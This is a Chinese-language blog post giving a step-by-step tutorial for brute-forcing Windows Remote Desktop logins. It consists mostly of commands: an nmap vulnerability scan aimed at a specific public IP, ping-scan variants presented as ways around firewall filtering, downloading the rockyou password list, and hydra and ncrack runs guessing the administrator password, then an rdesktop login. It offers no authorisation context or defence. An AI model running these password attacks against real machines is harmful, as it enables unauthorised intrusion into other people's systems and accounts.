暴力破解Windows RDP-泓源视野

暴力破解Windows RDP

暴力破解Windows RDP(3389)

通过nmap -sV --script=rdp-vuln-ms12-020 -p 3389 205.185.116.249 -Pn

再拦截上面的TCP ACK Ping扫描

或者 sudo nmap -sn 172.17.0.2 -disable-arp-ping  或者

sudo nmap -sP -PA 192.168.43.132 -disable-arp-ping

使用ICMP回环绕过TCP ACK Ping

sudo nmap -sP -PE 192.168.43.132 -disable-arp-ping

使用ICMP时间戳Ping绕过ICMP回环

sudo nmap -sP -PP 192.168.43.132 -disable-arp-ping

wget https://github.com/mishrasunny174/WordLists/raw/master/rockyou.tar.gz

tar -zxvf rockyou.tar.gz

RDP是远程桌面协议。

  1. $ nmap your_target
  2. Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST
  3. Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)
  4. Host is up (0.28s latency).
  5. Not shown: 988 closed ports
  6. PORT STATE SERVICE
  7. 135/tcp filtered msrpc
  8. 139/tcp filtered netbios-ssn
  9. 445/tcp filtered microsoft-ds
  10. 593/tcp filtered http-rpc-epmap
  11. 3389/tcp open ms-wbt-server # 这个是远程桌面端口
  12. 4444/tcp filtered krb524
  13. 6667/tcp filtered irc
  14. 49152/tcp open unknown
  15. 49153/tcp open unknown
  16. 49154/tcp open unknown
  17. 49155/tcp open unknown
  18. 49163/tcp open unknown
  19. Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds

使用hydra暴力破解:

  1. hydra -t 4 -V -l administrator -P /root/rockyou.txt rdp://your_target
  1. -t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4.
  2. -V = Verbose shows you the attempted passwords.
  3. -l = Username
  4. -P = Password list
  5. rdp:// = Port 3389

使用ncrack暴力破解:

  1. ncrack -p 3389 -v -user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx
  1. -p = Port number
  2. -v = Verbose shows you any found passwords in realtime
  3. -user = username
  4. -P = Password list

远程桌面登录:

  1. rdesktop your_target
本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
51

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8235240 位访客, 您的IP是:[216.73.216.37]